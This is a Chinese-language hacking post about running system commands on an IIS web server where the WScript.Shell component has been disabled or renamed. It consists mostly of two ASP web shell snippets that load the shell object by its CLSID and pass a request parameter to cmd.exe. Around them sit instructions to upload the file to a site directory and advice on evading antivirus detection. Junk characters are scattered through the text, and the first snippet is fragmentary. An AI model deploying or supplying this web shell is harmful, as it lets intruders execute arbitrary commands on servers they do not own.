没有wscript.shell组件提权方法

admin

• 可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    f" b+ g* A% F6 c: t' q$ X$ {
• 一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
  % c( \" @4 u3 J5 H
• 要想让运行命令可以试试这种方法，成功率为五五之数。
  ( t5 U3 F8 d! j5 `3 V$ T6 R
• 把下面代码复制：
  - h2 g# c; t* o  S+ a  ?
• <%
  
• end if
  , I5 Y3 F6 G7 ~- t
• response.write(”")
  
• On Error Resume
  ! B1 s  ^* Z& [* g! w
• Next
  
• response.write oScriptlhn.exec(”cmd.exe /c” &
  . i. R" A  d- D; R. j" y
• request(”c”)).stdout.readall
  0 Y, _4 Z4 i: q2 J
• response.write(”")
  
• response.write(”")
  
• response.write(”
  
• “)
  
• response.write(”")
  
• %>
  $ C( k7 `3 K/ W! u4 \
• 保存为一个asp文件，然后传到网站目录上去
  0 z# N- a. X: t! l9 G* D  }% `
• 运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
  
• 我用此成功运行过cacls命令。
  
• 第二那就是运行时出错，可能限制某些代码执行
  
• 无wscript.shell组件提权又一个方法
  ( ^2 S& n; ^' g
• <object runat=server id=oScriptlhn scope=page
  
• 
  
• classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
  & O* i7 @# x, _$ O/ t3 Q
• <%if err then%>
  
• <object runat=server id=oScriptlhn scope=page
  
• 
  
• classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
  * }4 v- ^* a4 m0 p  B
• <%
  
• end if
  
• response.write(”<textarea readonly cols=80
  
• 
  ' K, |) V+ v5 H  r% S6 d+ v
• rows=20>”)
  * q$ z7 N* e) z, h
• On Error Resume Next
  
• response.write
  / ^- p. S; N& j2 `
• 
  0 K6 v9 @# _4 t. V
• oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
  
• response.write(”</textarea>”)
    [* e- j- _$ t: {! e
• response.write(”<form
  
• 
  . A& t/ l. m$ f7 g
• method=’post’>”)
  
• response.write(”<input type=text name=’c'
  
• 
  
• size=60><br>”)
  
• response.write(”<input type=submit
  
• 
  * ~0 U1 u1 N. ~+ a3 [9 h
• value=’执行’></form>”)
  ! b* g% a6 N& \9 }
• %>
  # |4 @9 M# P2 G7 S2 I9 n- H, O
• 保存为ASP，此代码可能被杀，请注意免杀。
  + o- R! G: b+ @1 G% M" T3 P
• 原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建
  

复制代码